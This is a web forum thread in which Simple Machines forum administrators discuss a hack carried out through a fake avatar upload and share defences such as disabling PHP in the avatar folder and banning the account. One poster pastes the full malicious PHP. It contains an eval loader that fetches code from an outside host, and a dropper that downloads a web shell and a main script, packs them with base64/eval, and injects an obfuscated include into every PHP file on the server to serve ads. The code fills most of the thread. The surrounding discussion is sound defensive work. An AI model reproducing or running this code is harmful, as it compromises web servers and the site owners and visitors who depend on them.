Topic: Hacked, script injection

[Tiribulus]

There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

It looks like that's right.
adding an .htaccess file with this php_value engine off entry should work.

Or, it seems you could also add this

Code: [Select]

<Location "/docroot/av_directory">
 php_admin_flag engine off
</Location>.  to the httpd.conf file to accomplish the same thing

I was thinking it might not be a bad idea to throw such a .htaccess file in every directory that doesn't need PHP interpretation, but that might be misused that way.

[hobox]

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

[MrPhil]

adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

[chrishicks]

http://www.stopforumspam.com/search?q=krisbarteo 

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547

[Aleksi "Lex" Kilpinen]

There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

This is correct - I have it in use for a custom avatar folder.

[bsm]

Well, it took me a while - but all scripts are clean, and I'm up and running.

NOW, I have a full backup of clean scripts - ready to restore anytime.

[CarlT100]

http://www.stopforumspam.com/search?q=krisbarteo 

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547

Thank you for the stopforumspam link.  I have saved hoping I will not have to use it.

[Tiribulus]

What I found out so far is that the host has to have AllowOverride set in httpd.conf to permit .htaccess file directives to supersede the global settings in order for this to work with .htaccess files. This might be what the guy above was talking about. The Apache docs say this can have a negative effect of performance due to the scanning required to find the commands in those files. They say if possible to include them in the directory section of httpd.conf. Being that the server is sitting at my feet I did this:

Code: [Select]

<Directory "/path to avs dir/">
 php_admin_flag engine off
</Directory>
Now my hello.php file is offered for download instead of being run. Hmmm, I suppose that is preferable to being executed on the server.

[H]

adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini

[sjokomelk]

I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

Code: [Select]

<?php;$url = 'http://wplsat23.net/?update=main';$done = false;if(!$url){return '';}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : ""; $query = "GET " . $url_info[path] . " HTTP/1.1\r\n"; $query = $query . "Host: " . $url_info[host] . "\r\n"; $query = $query . "Accept: */*" . "\r\n"; $query = $query . "Connection: close" . "\r\n"; $query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n"; $query = $query . "\r\n"; $errno = 0; $error = ""; $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode("", $resp);eval($ret);?>
and this is the code on that page:

Code: [Select]

$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.

[Tiribulus]

<<< Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini

Yeah, lock the windows and leave the door open.

[sjokomelk]

Think I have at least worked out what the injection does.

The <?php eval(base64_decode  <insert value here>
contains an address to a folder in the installation.

In my case it was a theme helios multi template.

From 28th of April, until now, 25mb of files was stored there.
Over 2100 files.

All of which seems to be links to other infected sites which has been injected with commercials. With several commercials in each.
Many of the commercials seems to be flash files, which I haven't tested to run yet, but I downloaded all the files that the hack left and I'm going to inspect those closely.

Not that I will be able to make a difference in sorting out how to fix it, unless you can run a preg_replace and remove <? from files uploaded. But I'm not there yet with my php knowledge, so I'll just continue researching and posting what I find.

[Rumboogy]

He got me today too...I am in the process of restoring a backup (I hope).

I had a member ask if they could get a virus from this code? How do I answer that question.

Thanks,

Wally

[Tiribulus]

Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

[JBlaze]

Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

[Tiribulus]

Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that

[JBlaze]

Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that

Need to think outside the box

[djkimmel]

Can't the person just come back again using a different name?

I had no idea someone could upload a fake avatar to the default attachments directory and cause this much damage and work. I do now.

SMF 1.1.8

I have the bookmark mod and the donate mod. I think that is it. I have tinymce on another path in a mambo install. That is where the 'avatar' script put the files that infected all of my PHP files on my part of the shared server. The script reported it was looking for the longest path only though not tinymce - see below.

I was trying to figure out what this new 'member' krisbarteo was up to when the forum reported he/she was trying to edit his/her theme. I had already put him/her in a limited group that can't post or pm because of the same Latvian IP address as mentioned above - lots of visitors from Europe IPs lately who have been trying to spam.

Instead of getting a list of themes with how many persons were in each when I accessed them in admin (I have everyone in one theme) I got an output web page 244 pages long in MS Word (when I copied it) of an upload to the mambo directory and a message saying 'injecting PHP files' along with a list of all the PHP files that were changed across all my folders/domains/programs.

